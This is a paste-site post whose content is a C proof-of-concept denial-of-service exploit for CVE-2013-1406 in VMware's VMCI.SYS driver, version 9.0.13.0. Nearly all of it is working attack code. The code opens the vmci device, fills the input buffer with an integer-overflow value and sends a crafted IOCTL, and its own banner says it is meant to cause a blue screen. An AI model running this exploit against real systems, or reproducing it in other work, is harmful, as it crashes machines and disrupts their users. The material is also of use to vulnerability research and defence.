CVE-2013-1406 PoC DOS exploit


SUBMITTED BY: Guest

DATE: March 8, 2013, 9:26 p.m.

FORMAT: Text only

SIZE: 1.4 kB

HITS: 1416

  1. /*
  2. This PoC only for version
  3. VMCI.SYS 9.0.13.0
  4. */
  5. #include "stdafx.h"
  6. #include "windows.h"
  7. #define count_massive 0x189
  8. #define ioctl_vmsock 0x8103208C
  9. #define integer_overflow_size 0x12492492;
  10. int _tmain(int argc, _TCHAR* argv[])
  11. {
  12. HANDLE vmci_device;
  13. DWORD bytesRet;
  14. int inbuf [count_massive];
  15. int outbuf[count_massive];
  16. int size_=count_massive*sizeof(int);
  17. printf("**************************************************\r\n");
  18. printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
  19. printf("**************************************************\r\n");
  20. //opening vmci interface device
  21. vmci_device=CreateFileW(L"\\\\.\\vmci",GENERIC_READ,FILE_SHARE_WRITE|FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
  22. if (vmci_device!=INVALID_HANDLE_VALUE)
  23. {
  24. printf("[+]vmci device opened \r\n");
  25. //prepare input buffer
  26. memset(&inbuf,0,size_);
  27. //vulnerable to integer overflowing parameter
  28. inbuf[4]=integer_overflow_size;
  29. printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");
  30. //Delaying signed with Diablo stamp :D
  31. Sleep(0x29a);
  32. Sleep(0x1000);
  33. DeviceIoControl(vmci_device,ioctl_vmsock,&inbuf,size_,&outbuf,size_,&bytesRet,NULL);
  34. CloseHandle(vmci_device);
  35. }
  36. else
  37. {
  38. printf("[-]Error: Can't open vmci device!\r\n");
  39. }
  40. return 0;
  41. }

comments powered by Disqus